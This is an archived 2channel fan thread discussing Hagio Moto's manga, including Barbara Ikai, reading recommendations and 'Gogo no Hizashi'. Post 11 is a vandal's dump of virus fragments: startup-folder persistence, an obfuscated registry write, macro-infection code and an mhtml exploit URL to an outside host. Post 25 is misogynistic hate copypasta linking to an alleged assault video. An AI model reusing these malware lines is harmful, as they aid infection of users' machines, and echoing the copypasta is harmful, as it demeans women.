2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

萩尾望都(24)

1 :花と名無しさん:2006/12/25(月) 10:18:07 ID:???0
■萩尾望都さんの作品群について、ファンもアンチも普通の読者も
 忌憚の無い意見・感想をどうぞ。

■前スレ
萩尾望都(23)
http://comic6.2ch.net/test/read.cgi/gcomic/1159371657/

■過去ログ等は>>1-10あたりに


2 :花と名無しさん:2006/12/25(月) 10:19:06 ID:???0
■過去ログ

1 http://salad.2ch.net/gcomic/kako/943/943459796.html
2 http://salad.2ch.net/gcomic/kako/980/980342609.html
3 http://choco.2ch.net/gcomic/kako/996/996629760.html
4 http://comic.2ch.net/test/read.cgi/gcomic/1004442612/
5 http://comic.2ch.net/gcomic/kako/1018/10181/1018111053.html
6 http://comic.2ch.net/gcomic/kako/1031/10313/1031395977.html
7 http://comic.2ch.net/gcomic/kako/1038/10389/1038921666.html
8 http://comic.2ch.net/test/read.cgi/gcomic/1048415386/
9 http://comic.2ch.net/test/read.cgi/gcomic/1064331328/
10 http://comic2.2ch.net/test/read.cgi/gcomic/1073708464/
11 http://comic4.2ch.net/test/read.cgi/gcomic/1081594401/
12 http://comic6.2ch.net/test/read.cgi/gcomic/1088607811/
13 http://comic6.2ch.net/test/read.cgi/gcomic/1097860642/
14 http://comic6.2ch.net/test/read.cgi/gcomic/1102227907/
15 http://comic6.2ch.net/test/read.cgi/gcomic/1108086732/


3 :花と名無しさん:2006/12/25(月) 10:20:38 ID:???0
16 http://comic6.2ch.net/test/read.cgi/gcomic/1116612564/
17 http://comic6.2ch.net/test/read.cgi/gcomic/1124828648/
18 http://comic6.2ch.net/test/read.cgi/gcomic/1129152799/
19 http://comic6.2ch.net/test/read.cgi/gcomic/1133430576/
20 http://comic6.2ch.net/test/read.cgi/gcomic/1140100660/
21 http://comic6.2ch.net/test/read.cgi/gcomic/1146486041/
22 http://comic6.2ch.net/test/read.cgi/gcomic/1153146751/

にくちゃんねる
http://makimo.to/2ch/search.html
萩尾スレ過去ログ倉庫
http://gcomic2ch.hacca.jp/hagio/index.html


4 :花と名無しさん:2006/12/25(月) 10:21:19 ID:RlI+9zANO
ちんこ

5 :花と名無しさん:2006/12/25(月) 10:21:29 ID:???0
■関連スレ
[SF]
@@@@SF作家としての萩尾望都@@@@
http://book3.2ch.net/test/read.cgi/sf/1012996200/

[懐かし漫画]
【萩尾望都】ポーの一族・5【永遠の名作】
http://comic6.2ch.net/test/read.cgi/rcomic/1155186181/
【難解】百億の昼と千億の夜【深遠】2
http://comic6.2ch.net/test/read.cgi/rcomic/1155067961/


6 :花と名無しさん:2006/12/25(月) 10:22:25 ID:???0
               _  -ー--―- .._
             ノ´          ヽ
            〃               `ーく
          , '´                 \
         /            /,      ヽ、 ヽ
          i 、           (   `、ヽ   }リ il
        (jり     ノ  ,     ヽ   ヽノ Y' , リ
        ノ    / , イ   、、  }li  il ! リ }((,イ
       〃   ,  /   { {{ r(_ノノ ノ人_ノノ〃_,イリ` }!
       t  {、 い.ヽ.__トこ._'⌒ー-,r_ニ.´^tフ,.イt 彳
        /〃 {{下、.‐'フfrrヘ`   i '{?タk {{ ヽ',.イ
        いヽ_ハ. い?ヾ:ェタ.    l ^'宀'´ !ラく小{
        `爪_ ゝくヘ  ´^    |     ,ハ.ノノノ
         ``ヽ._ゝベ、      _´_     /、(し´
            `いr、\   ´ー ` ,.イゝー'´
              ゞ-ク{ `丶 .__ _,/l!ト、
               /:::l  \   / l:::ヽ
            ,.イ::::::::::!   /r:く_  l::::::l`ー- ._
         _,.-'´:::::|::::::::::::!_,.-‐''_}::{_ ̄`ヽ:::!::::::::::::`ヽ、
       ,.-'´、::::::::::::::!:::::::r'´::,r'´イ ´ト. ̄ヽ::/〉:::::::::|::::::ハ
      ,::::::::::::i::::::::::::`フ´ヽ'r'7:::l  |::| 「`"、::::::::::::!:::/ /:i
       l::::::::::::::!::::::::::/:::::::::::::l.l::::|   !:| |::::::::::ヽ::::::!:/:/:::::|
        l::::::::::::::::!:::::::::ヽ::::::::::::l:::::ト、  ,!::|.l::::::::::/:::::::!〃::::::::!
        !:::::::::::::::::!::::::::::::ヽ::::::::!_::ト、 ` ,l:::l:|:::::::/::::::::l/::::::::::::|



7 :花と名無しさん:2006/12/25(月) 10:28:15 ID:???0
            /::::::::::::::::::::::::::::::::::::::::::::::::::::::::ヽ
           /::::::::::;::::::::;::::::::::::::::::::::::::::::::::::::::::::::`:、
          ノ:::::;::::/:::/〃;/:::::::::::::::::::::::::::::;::::::::::::::ヽ
          ´//::/;'/:::::://;::::::::;::::::::::::/:::::::〃r'^ヽ:::::::i
         〃::/〃::/〃/::::::/:::::;::/:::::/::/    }:li:::|
         {':://'/:/,r‐、:'::::/_;.ノ__ -‐':_;:/   /!:リ::!
         ∨l:li'::l::i r 冫r‐''´   ニー- .._    ´ノ'ノ
          Yl:!l:l::l { {{イ   ヽ´{「ft;リ`   ,r≠7
           、!l:l::.い、ヽ    ^ ー-'    i{ヒタ7
            ヽ-.ヽ_)              |` /
              /{'   、           , ‐' /
             /! 、  \     ‐--  /
            /::::::l  ヽ.   丶    `" /
           /:|:::::::::::!   \    /、ー- - '
          /::::::::!:::::::::::、    `ー_' l::ヽ`丶、
     _/__::::::::::::!::::::::::::ヽ. ,rクヽ::}_ ̄ヽ:::::::::`ヽ
    /:'´:::::::`ヽ::::::!::::::::::::::::/,.:':::/:「 ト`ヽ:::〉:::::|::::ハ
   /::::::::::::::::::::::、:::::ヽ:::::::::〃::::/l::::l |::l冫'::::::::!:::::::{
   '::::::::::::::::://::::ヽ:::::::`7`ヽ〈. |::::l |:::l:`:7:::::!:::::::::t
  i::::::::::::::::〃::::::::::::::::::::::/:::::::::::ヽ!::::| !:::l:::i::::::!:::::/::::ヽ,、
   !::::::::::::::::::::::::::::::::::t:::::ヽ::::::::::::::|:::::l |::::!:!::::l:::/:: ̄´:::::ヽ
    !:::::::::::::::::::::::::::´ ̄{::::::::::\:::::::!:::::l ,|::::,!::::j/::::::::::::::::::: ̄ヽ


8 :花と名無しさん:2006/12/25(月) 10:29:04 ID:???0
        ,. ‐'"´ ̄ ー- .
      , ‐ '  _       ヽ ._
     /  rく'´  ヽ        `ー 、
    / /  ノ }   ノ             ヽ
  、_ノ   !  /  , '      }     i }
   〃  ノ /   '´  ノ  ノ  ノ j  } リ ト
   {  ,/ {/   .  '´ / / ,〃 / イ! ,ハ
    、イ{ 人. /  , '´ ,∠__, -' //ノ〃 }
   } ヾ_ト、 {  /{   /,.=、7 / ,r_⌒/ _,ノ
   ヽ. {、_) ゝ{ ハ_ 小tツ{,.イし i{t;リ7 (
     )ヽーr{ `7 ` ^`  `   |`^ !ノ^
    `ーr ヽ.),イし'       ,! /
        !{ l ^ー'´     __´ /
      `` l   \    ー‐ /
         /!     ` - .__,.イ
      /  ,l       ノ  ヽ     _,,. 、
    _,. /   ! !      /    }ー ‐''7-‐' `ヽ
 __,.-'´:.:,'   {|     / __   !:.:.:.:./`ー‐'   ',
´ ,!:.:.:.:.:/    、   // ./ /:ヽ l:.:.:./         i
/!:.:.:.:/ ,.イ⌒ヾ、 /.//./:.:.:.:.丶!:./ !         !
  |:.:../:.:.:.| _,.--、ヽ'-‐'-、/:.:.:.:.:.:.:.:.`:!|      |
  !:.:.:.:.:.:_,.-':,r'⌒}_::}、‐-、::冫:.:.:.:.:.:.:.:.:| l        l
  ,!:.:.:.:.:.ヽ_イ_,// !::| ̄/:.:.:.:.:.:.:.:.:.:.::.! !   /    |
 /,!:.:.:.:.:.:.:.:.:/:::/ /::::! ,':.:.:.:.:.:.:.:.:.:.:.:.:!l. //    |
/ /ヽ:.:.:.:.:.:.:/:::/ /:::::! /:.:.:.:.:.:.:.:.:.:.:.:.:.:.} / , '      !
./  l:.:.:.:.:./:::/ヽ/:::://:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:ヽ '      l

9 :花と名無しさん:2006/12/25(月) 10:44:10 ID:???0
                     ,.-‐=ー-−、
                , -{〃´r  `ヽ. 丶
                /, イ い ー-、    `、
                ノ ゝ  `下ヽい  j ぃ.ヽ
               〃 い ぃ_ノ八ー' 、_,小 ヽ.い
                 八ゝィ(、_冫ィrくヘ(__,〃 ミヽYリ
             { ゝいン‐-廴いゝン-いゝ川 {
             }Yハ 涎nヾ代愆シ`〉Yィ'リ
             ヾゝい    j    / ノリ´
                `込  __,,__   /イ^′, -<¨¨ ‐、
                 r_、  ̄  イ^´ /       \
                    }ニヽ.`¨´〆´{ /            ハ
                ノ廷込Y'{rI巧∨    r  _     ',
          , -‐、 -‐'´  ̄`ゝ孑乍ミ7     ノ⌒ ヽ {.   i
          〃シ/兮、  _/匁/}ドI父f (、ノ_,∠._   __い、_ノ |
        /乏yiWrfヘ ヽゞタ/'ノ}!t},ネ{ 小 r符ミ  ' r符ミtり} |
      /'爻〃 リ' }j'りハ.  Vイタ{{カt,ハ{ {ぃ ^¨´ h `¨^ rラ′!
     /〃朮/x〃ォリ〕}ルiヘ. hホ;!}价}  いヾ、   '   ,{(.ノ/
   /ッ厶 ル'衣/ゞ/仞{刔ハ !仔}.{弁{ / 弋タ\` ̄´ イ心./
   '^^^/ ty'r片/r_/r〃えl爿ヘ.l込{ }戈j./ /´`フ'| ` ー ´ {ヘ‐'^ヽ
.    / ん幺イ7方ソ,!余;朷j tj|爻} {父j′ / ヘ   / \  ヽ
    '  ⌒´h伐ルくj弐ネくリ,{f|戈{i }_込_イ戈ぇ癸,ゝにユtュ.--―‐、
   /    亅ゝ'´l }iゞlゞ{小!tゞ'卞冖示テ=会テ示冖'j|「 ̄`
   /      !    l {爻j〃}jtぐく必込X述シx伐ゞム圦.v!
  '      |i   | ヽハ爿刈ネYヘ弐ソハ.Xイ夾ac^込7
 /        l !   l    Et{r{/`込ぃ.來ネa |  `7
/      h|    i    t予/   ヾ沙宀'   l   /
       亅l    l    `ァ′ /  !.      ! /
、       j !      !   /   /   |     i c⌒ヽ!
ハ     / |     ! /
{ ヽ  / U

10 :クリスマスは:2006/12/25(月) 22:40:05 ID:???0
ロンドンで。

新スレ、乙です。

11 :<body onload=window()>:2006/12/26(火) 01:11:47 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


12 :花と名無しさん:2006/12/26(火) 09:42:02 ID:???0
また嫌がらせかよ

13 :花と名無しさん:2006/12/26(火) 20:53:41 ID:???0
>>1
おっつ〜

14 :花と名無しさん:2006/12/26(火) 22:47:18 ID:???0
1さん乙です。( ^^) _旦~~

ちょっと訂正させてね。
>>5
[懐かし漫画]
【萩尾望都】 ポーの一族・6 【永遠の名作】
http://comic6.2ch.net/test/read.cgi/rcomic/1162451665/

15 :花と名無しさん:2006/12/27(水) 12:33:57 ID:???0
hosu

16 :花と名無しさん:2006/12/27(水) 17:29:04 ID:???0
>>12
上にあるスレは、もれなく貼り付けられるんですよ。

17 :花と名無しさん:2006/12/28(木) 10:45:49 ID:???0
見れないことないけど面倒なんだよなー

18 :花と名無しさん:2006/12/28(木) 11:34:42 ID:???0
前スレの1000グッジョブ。

19 :前スレ梅立て人:2006/12/28(木) 13:22:20 ID:???O
>>18
ども。

20 :花と名無しさん:2006/12/28(木) 16:08:42 ID:???0
前スレ993さんへ
かぎりなく夢オチっぽいけど夢オチじゃないよー
トキオの欲求が未来も過去も修正してしまった。
ただそれは、トキオの望みにもかかわらず、
トキオの望みとは違った物になったってお話じゃないかな。
修正前の過去の記憶が夢と同じだと言われたら、夢かもしれないけど、
トキオにとてはどっちも現実だったんだろうなぁ。
未来への希望はある、ただ自分の手の届くとこにはないって読んでて思った。

21 :花と名無しさん:2006/12/28(木) 20:53:25 ID:???0
トキオの望みとは違った形になったけど、現実が修正されてしまった結果
思いがけずバルバラが救われることになった、という意外さがキモではないかなー。
(バルバラにはキリヤが必要だった)

22 :花と名無しさん:2006/12/29(金) 00:47:16 ID:???0
銀の三角にも繋がるテーマ性で、夢と現実の相互関係が
おもしろさの重要な鍵になってますね。
「夢をかなえたい」とはよく言うけど、その夢ってあくまでも現実の延長ですよね。
では本当に「夢物語」をかなえたとして、それが現実に影響するとしたら…。

バルバラでは夢は未来を示す部分もあり、その辺りの複雑さも面白いです。

23 :花と名無しさん:2006/12/30(土) 01:22:51 ID:???0
移転乙。

24 :花と名無しさん:2006/12/31(日) 00:12:43 ID:1z+AkDOvO
ちょっとアゲ

25 :花と名無しさん:2006/12/31(日) 00:30:53 ID:???0
男性諸君、結婚すると不幸になる。幸せにして当たり前で感謝無し。都合の良い奴隷としてだけ感謝され、搾り取って用済みになればゴミ箱へポイ♪
女の外面は綺麗で清潔で良い人、内面はずるくて汚いため、口も悪い+薄情+嘘+女同士も上辺仲良し裏では悪口三昧
女の成分はA(性悪陰湿残忍+損得自己中感情)+B(良い女演技+体形+整形化粧+ファッション)
↑良い女演技は好きな男>>異次元>>男集団>他人の順に良くなる。年齢とともにBのメッキがはがれ内外ともに醜くなる(Aの良い女は極少数)
女は「人生の不良債権、北朝鮮、金メッキを施したゴキブリ」
男女は対等で平等。男が女を養ったり守る必要はない「見切れ!見切り千両!私不幸なの?嘘!泣いてます?演技!情けは不要!つけこまれるぞ」
女は社会的優遇、過剰な法的保護、仕事と家庭の二束のわらじを得て、女尊男卑〜結婚しようとする君を彼女は陰で小馬鹿にしている事でしょう〜

★結婚は保留し、沢山の女と自由に恋愛(sex)を楽しめ♪★避妊必須
★捨てた女は優しい真面目男が結婚(残飯処理)してくれるさw★

それでも結婚する君へ究極護身法→[夫婦財産契約登記]
夫婦財産契約により、自分の稼いだ財産はすべて自分の物

弱い者いじめは最低と言いつつ、赤ちゃんを殺す母親(そして無罪判決(笑
狙撃は女子のほうが強い。男はノイローゼになってやめてしまうが
女は何人殺してもノイローゼにならない。骨盤が安定しているため

ナチスの拷問で、女の拷問の残虐非道さを見て、拷問をしていた男達もひいたという
拷問しながら楽しそうに笑みをうかべていたそうだ。罪悪感や引け目が無い

・有史以前が女尊男卑の時代だったことを指摘したのは、スイスの学者バッハオーフィン
アマゾン女族の女王は、法律を定め、男達には卑しい奴隷の仕事を課した
男児が生まれたら、生き埋めにするか、脚と腕を不自由にして、戦えなくし奴隷とした
・王位継承権が女性にだけあった古代エジプトでは女性権力が非常に大きかった
・日本でも卑弥呼が女王
http://kr.img.dc.yahoo.com/b1/data/dci_etc/76.wmv ←女集団が女一人をリンチしている動画(執拗に蹴り続けながら皆楽しんでる 一部エロ有

女は虐げられてきた?父系社会など人類の歴史から見ればほんのわずかな期間に過ぎない。むしろ

26 :花と名無しさん:2006/12/31(日) 21:10:28 ID:1z+AkDOvO
あげ

27 :花と名無しさん:2006/12/31(日) 21:11:16 ID:kG+DxaC90
上がってないと見られない、やっかいなスレになってしもた・・・

28 :花と名無しさん:2006/12/31(日) 21:30:39 ID:mC7qi45+0
そうなの?

29 :花と名無しさん:2006/12/31(日) 22:24:05 ID:???0
萩尾さんの漫画をよく読んだ一年でした。
ちょっと見ない間にスレが荒れてるようですが、萩尾スレの皆さん
良いお年を。



30 :花と名無しさん:2006/12/31(日) 23:14:28 ID:???0
          §
          §
          ,fニニヽ
        /:::::ヽ      ヾ、
          |l' ̄ ̄ ̄'l|       ヾ、
        { ------- }    ___ヾ___
        |:ニ:(ノ:二:二|)   @___))___)
        {______________}        《
                       》 /⌒ヽ
                       ((^ω^ )  除夜の鐘鳴らすお
                        ヽと  ヽ
                        (⌒)   )
                          (_)

31 :花と名無しさん:2007/01/01(月) 13:54:23 ID:???0
エーリク・フリューリンク君、お誕生日おめでとう!

32 :花と名無しさん:2007/01/04(木) 02:46:16 ID:1vGj1QLY0
ずっと人大杉で見れんかった。
今日やっとこのスレに初参り。めでたいめでたい。

33 :花と名無しさん:2007/01/04(木) 07:00:52 ID:???0
>>32
http://gikonavi.sourceforge.jp/top.html

34 :花と名無しさん:2007/01/04(木) 15:26:08 ID:PXUUOwpY0


35 :花と名無しさん:2007/01/04(木) 17:09:58 ID:Y975aB310
>>33
ありがとう。ダウンロードしました。

36 :花と名無しさん:2007/01/06(土) 00:13:57 ID:u8+22GQa0
ご意見いただきたい。
「11人いる!」を読んでかなり面白かった。まだこれだけしか
萩尾作品読んでないんだけど、次は何かおすすめありますか?

37 :花と名無しさん:2007/01/06(土) 00:24:13 ID:???0
>>36
11人いる!の続編、ただし話の色合いはかなり違うものに(SFよりヒューマンドラマ系に)
キャラのその後を知りたいならこれをお勧め

11人いる!と近い時期のSFなら、まず「スター・レッド」「精霊狩り」お勧め
ほぼすべてのSFがSF好きに評判よいです
「マージナル」
レイ・ブラッドベリ原作の「ウは宇宙船のウ」
超本格SF「銀の三角」、原作つきの「百億の昼と千億の夜」は、難解ですが、
SFが面白いと思えた人なら絶対に一読の価値アリ

38 :花と名無しさん:2007/01/06(土) 00:26:06 ID:u8+22GQa0
>>37
レス有難うございます。続編は、文庫版で読んだのでついてきてました。
「スター・レッド」「精霊狩り」読んでみます。

39 :花と名無しさん:2007/01/06(土) 00:33:16 ID:???0
>>37の続き

萩尾作品そのものに興味を覚えたなら、初期の名作
「ポーの一族」(吸血鬼もの)
「トーマの心臓」(ほんのりと少年愛の香りが漂います(その手の物の先鞭です)がむしろテーマは「神の愛」)

ヨーロッパ舞台の文芸作品もたくさんあります
地味なようでいて佳品名品ざくざく
「トーマ」のキャラクターのアナザーストーリー「訪問者」
「メッシュ」(短編連作)
「アメリカン・パイ」「ゴールデン・ライラック」「エッグ・スタンド」

最新作がSF「バルバラ異界」ですが、そのひとつ前に発表されたのが萩尾作品最長の
心理ドラマ、「愛」「支配」をテーマにした「残酷な神が支配する」
これは義父による少年の性虐待がモチーフであること、
トラウマを扱っているので話がループループでなかなか進まないことなど、初心者には高いハードルですが
このスレッドの過去ログでえんえん語り合われている、奥の深い作品です
モチーフに耐性があり、覚悟が出来たら、ぜひ一読を

40 :花と名無しさん:2007/01/06(土) 00:39:12 ID:???0
>>39の続き

さらに一時期バレエものを集中して描かれていました
陽性で(裏に色々同時進行しているのですが)明るく楽しくスポ根調でさえある「フラワー・フェスティバル」
ドロドロドラマありだけどラブストーリーで憎んでいたものとの和解もありで「ローマへの道」
いろんな意味で陰性のw「感謝知らずの男」
などこれも、興味あれば。


と、しつこく列挙してごめんなさい
萩尾作品は山ほどあるので、たっぷりいろいろ楽しんでください
そしたらここでまたお会いしましょう

41 :花と名無しさん:2007/01/06(土) 01:26:34 ID:???0
今週WJ武井、名作へのオマージュだよ。


42 :花と名無しさん:2007/01/06(土) 02:07:37 ID:whkzQYWTO
気がつけば30年以上ファン

43 :花と名無しさん:2007/01/06(土) 03:02:22 ID:???0
たった今それに気づいた。

44 :花と名無しさん:2007/01/06(土) 06:31:31 ID:???0
わたしはたかだか20年ファン。

45 :花と名無しさん:2007/01/06(土) 10:11:29 ID:???O
うわっ! 俺も30年以上だ……。

46 :花と名無しさん:2007/01/06(土) 17:30:03 ID:???0
>>41
「11人おる!」

47 :花と名無しさん:2007/01/06(土) 17:44:03 ID:???0
はじめまして。
去年ポーの一族、11人いる!、トーマの心臓を読んで萩尾さんのファンになり、
それからバルバラ異界を読んで絵のギャップに驚きました。
物語は面白かったけれど、正直昔の絵の雰囲気の方が好きだったのでショックでした。
いきなり最新作を読んだのがいけなかったのだろうか・・・
で、今また昔に戻って11月のギムナジウムを読んでるところ
これから作品沢山読んでいこうと思います。今大学生なんですが、もっと早くに出会いたかった・・・

48 :花と名無しさん:2007/01/06(土) 18:06:00 ID:???0
>>47
わたしはファン歴三年ほどの大学生です。
とりあえず、白泉社文庫の『銀の三角』は品切れ状態みたいなので、
未入手であれば見つけたときに買っておいてください。

49 :花と名無しさん:2007/01/06(土) 18:07:09 ID:???0
新しいファン地道に増えつづけてるね。
私もファン暦10年程度のぺーぺーだけど、最初読んだのは
フラワー・フェスティバルだった。クオリティの高さに驚いたのを今も覚えてます。
評価の高い作家さんだという事は知ってたけど、本当だなーと。
そんな驚きも序の口だったと半神、マージナル、銀の三角等々を読んでさらに驚いたっけ。

50 :花と名無しさん:2007/01/06(土) 18:45:18 ID:???0
私が萩尾さんを天才だとオモタのは、『午後の日差し』を読んだ時。
独身なのに、よくこんな話を描けるなぁと心底感心した。
「あなたと私は他人だけど、一番近い他人だわねえ。」ってラストにも。

51 :花と名無しさん:2007/01/06(土) 23:07:27 ID:???0
私も「午後の日差し」は隠れた名作だと思う。
あの作品を何度か読み返したけど、
その時の自分の立場や結婚年数とかによっては、
本当に読後感が違う。
何よりもラストに救いがあってそれがホッとさせてくれた。

52 :花と名無しさん:2007/01/06(土) 23:14:05 ID:???0
>>50
昔はじめて読んだ時は不倫部分の、なんてことないさりげない描写の隠微さにドキッとしたり
娘が父親にボディブラシを使われて嫌悪感もあらわに怒るあたりにドキッとしたりしたけど、
今読み返してみると
あの中年の危機ど真ん中なお父さんが銀杏を伐っちゃダメだ!と言ったところで不覚にもうるっと来た。
旦那を「近しい他人」としてやはり最後に選ぶのは、こういう歴史があるからなんだよな…

53 :花と名無しさん:2007/01/06(土) 23:31:31 ID:???0
>>46
この中に一人、11人目がおる!おまえやろ?

54 :花と名無しさん:2007/01/07(日) 01:38:06 ID:???0
午後の日差しの
お母さんが娘時代を思うとこのモノローグが好き。
手元にないからうろ覚えだけど
日差しがこの身を射し貫いていた―とかそんなかんじのとこ。

55 :花と名無しさん:2007/01/07(日) 16:59:30 ID:???0
「午後の日射し」もいい作品ですね。じわっと感じ入るところがある。

私は萩尾作品に出会ったのは中2の頃、ポーを読んでからなんですが、
吸血鬼はパンパイヤではなくバンパネラだと、完全にすり込みされて、
あとで全然違うところで「バンパネラって・・・」と言って怪訝な顔をされたことがあります。
そんな私も萩尾ファン歴27年・・・
数年前、芝居見に行ってて萩尾さんを見かけたときは嬉しかったナア。


56 :花と名無しさん:2007/01/08(月) 12:04:30 ID:???0
>>55
何のお芝居の時ですたか?

57 :花と名無しさん:2007/01/08(月) 17:09:25 ID:???0
>>50
独身とか既婚とか関係ないだろ
萩尾さんは男の子でもないしヴァンパネラでもないし“火星人”でもないけど、
その内面をよく描き出してただろうに

58 :花と名無しさん:2007/01/08(月) 17:13:26 ID:???0
>>57
そりゃそうだけど、実際にそういう立場である読者にしてみれば
「この人はどうして私の心を代弁してくれているんだろう」って種類の感動もするものなのさ

59 :花と名無しさん:2007/01/08(月) 20:09:47 ID:???0
>>58
それもワカルけどな。
余計な一言といえば余計な一言だと思う。いくつかの意味で。

60 :花と名無しさん:2007/01/08(月) 20:55:45 ID:???0
>>59
> 萩尾さんは男の子でもないしヴァンパネラでもないし“火星人”でもない

なんて言わずもがなの余計な煽りで否定するほどのこともない

61 :花と名無しさん:2007/01/08(月) 22:42:18 ID:???0
男の子はともかく吸血鬼とか火星人の「内面をよく描き出している」かどうかは
実際にはわからないじゃないんだろうか?とまぜっかえしてみるw

62 :花と名無しさん:2007/01/08(月) 22:55:05 ID:???0
いやいや、>>57=>>59は火星生まれの吸血鬼の男の子なんだよ

63 :花と名無しさん:2007/01/08(月) 23:21:43 ID:???0
なんだ中二か。

64 :50:2007/01/09(火) 00:51:19 ID:???0
>>56
バンパネラや火星人の生活は、実際にはあり得ないから
多少荒唐無稽な描写が出てきても許される。
でも、主婦の生活は、経験してる人もたくさんいるから
嘘っぽい描写はすぐにばれるし、読者をしらけさせる。
それを実体験の裏付けがないのに、想像力だけであそこまで
描ききった萩尾さんに心底驚いたから「独身なのに」って入れたんだ。

でも、あなたが不快に思ったんなら正直すまんかった。

65 :50:2007/01/09(火) 00:52:08 ID:???0
↑ごめん、>>57宛てですた。

66 :花と名無しさん:2007/01/09(火) 01:04:12 ID:???0
大丈夫だよ。言わんとしてることは>>57以外には皆通じてた。

67 :花と名無しさん:2007/01/09(火) 01:13:03 ID:???0
57は普段既婚者に「しょせん独身にはわからないわよお〜」とハブにされていて
カリカリしているのです

68 :花と名無しさん:2007/01/09(火) 14:32:15 ID:???0
>47
大丈夫です。これから末永いファンになってください。

11月のギムナジウムとか初期短編いいよねえ。
厨房の頃にはトーマや恐るべき、にはまり、英文科の学生初期にポーの世界に
舌を巻き、フェミニズムや比較文化に興味のあった後期にはマージナル、銀△
その他萩尾SFを貪り読んだ。どれもクオリティが高いのがすごい。

将来本当に萩尾作品の入手が難しくなったときには、古典漫画として
大全集がでるんじゃないかな。っていうか出して欲しい。


69 :花と名無しさん:2007/01/09(火) 20:13:34 ID:???0
初期短編では「かわいそうなママ」とか「ポーチで少女が子犬と」とか、ちょっと怖い雰囲気の話が好きだなぁ。
そういえば「かわいそうなママ」は、萩尾漫画で初めて「親殺し」が描かれた作品なんだよね。印象的。



70 :花と名無しさん:2007/01/09(火) 20:59:53 ID:???0
>>64
実体験がなくても、
普通に自分の家族(両親)とか友人の話とか
書物とかから基本的な資料は仕入れたんでしょ

>想像力だけであそこまで

というのは、ちょと違うと思う

71 :花と名無しさん:2007/01/09(火) 22:07:34 ID:???0
しつこい人だな…
家族や友人からの伝聞だろうが書物からの知識だろうが
本人がその時のその人物の感情に共感できなきゃ、
臨場感ある描写は難しい。
そのためには、他人の日常や人生をリアルに追体験できる
想像力がなけりゃ不可欠ってこと。

ていうか、知識だけで描ききれると思ってるほうに驚き。
グレッグのような性格破綻者やジェルミの神経症的世界も
知識からだけで描けてると思ってる?


72 :花と名無しさん:2007/01/09(火) 22:09:47 ID:???0
あ、私は >>50=>>64じゃないけど
あまりに呆れたのでつい書いてしまった。失礼。


73 :71:2007/01/09(火) 22:11:31 ID:???0
× 想像力がなけりゃ不可欠ってこと。
○ 想像力が不可欠ってこと。

74 :花と名無しさん:2007/01/09(火) 23:05:42 ID:???0
萩尾さんの場合
「自分に理解できる感情」まで持ってきてから描いてるんだろうな、と思う。
感性が変わってしまったら描かない、その線引きがすごいね。
作者が自分をよく知ってるっていうか、

75 :花と名無しさん:2007/01/09(火) 23:48:53 ID:???0
想像力や知識もだけど、よく人を観察してるんだろうな。

76 :花と名無しさん:2007/01/09(火) 23:59:32 ID:???0
キライなタイプのキャラは描けないって前に対談で言ってたけど
歳を経てからかなりバリエーションに富んだキャラを描くようになって
若い頃より興味の対象が広がったんだと思った。
どんなにうへぁなキャラでも萩尾さんには興味深い人物なんだな。

77 :花と名無しさん:2007/01/10(水) 09:28:46 ID:???0
>>71
「知識だけで描ききれる」とは70は主張してないようだぞ


78 :50=64:2007/01/10(水) 11:56:02 ID:???0
>>70
ん、確かに言葉足らずだったかも。すまん。
でも、私の言いたい事は、>>71が全部代弁してくれた。
ありがとう。>>71さん

んで、以下は>>77宛てのレスでもあるんだけど、
資料を読んだり、他人の話を参考にした知識で物語を構築するのは
漫画家なら誰でもする事だけど、それを嘘っぽくなく、読者に納得してもらえる形で
表現するのはなかなか難しいと私は思うんだ。
だからこそ、萩尾さんの想像力のすごさを改めて感じたって事。
その言いたい事のテーマ(みたいなのw)だけ汲み取ってくれれば十分。

79 :花と名無しさん:2007/01/10(水) 12:24:05 ID:???0
>>68
>将来本当に萩尾作品の入手が難しくなったときには、古典漫画として
>大全集がでるんじゃないかな。っていうか出して欲しい。

手塚治虫全集みたいなシリーズかな?
ワクワクするけど、作品数が多いからコンプリートするのに時間かかりそうw

80 :花と名無しさん:2007/01/10(水) 14:57:44 ID:???0
つか、今の時点で出してほしい。
作品集も全部揃えてないし。

81 :花と名無しさん:2007/01/10(水) 22:47:05 ID:???0
>>78
70です。
2段落め、それならよくわかります。
こちらも失礼しました。

82 :花と名無しさん:2007/01/11(木) 03:57:43 ID:???0
出すからには大判で、掲載時カラー完全収録でお願いしたい。<全集


83 :花と名無しさん:2007/01/11(木) 04:13:06 ID:???O
>>54亀だけど私もそこが好き。
手元に無いのでうろ覚えですが、
娘の身体を貫く強い日差しと、あの頃は許せないことが多くて苦しかったといったモノローグに
自分の10代だった頃を思い出しドキッとしました。

84 :花と名無しさん:2007/01/11(木) 04:48:23 ID:???0
自分自身の実体験にはない言葉でも、リアリティのあるセリフや描写には
読んでいてドキっとさせられる。
キャッチーなセリフで現わすのが上手いんだろうな。
「自分で稼げもしない者がポットを割る資格なんかない」とか、
「一週間どうしてた?」「なにも…たいくつだった」とか、
「愛のほかは、全部くれると言った!」とか(以上セリフはウロ覚え)


85 :84:2007/01/11(木) 04:53:15 ID:???0
一行抜けた…

>自分自身の実体験にはない言葉でも、リアリティのあるセリフや描写には
>読んでいてドキっとさせられる。
ていうより、その人物や物事の本質を突いてるセリフやエピソードだから
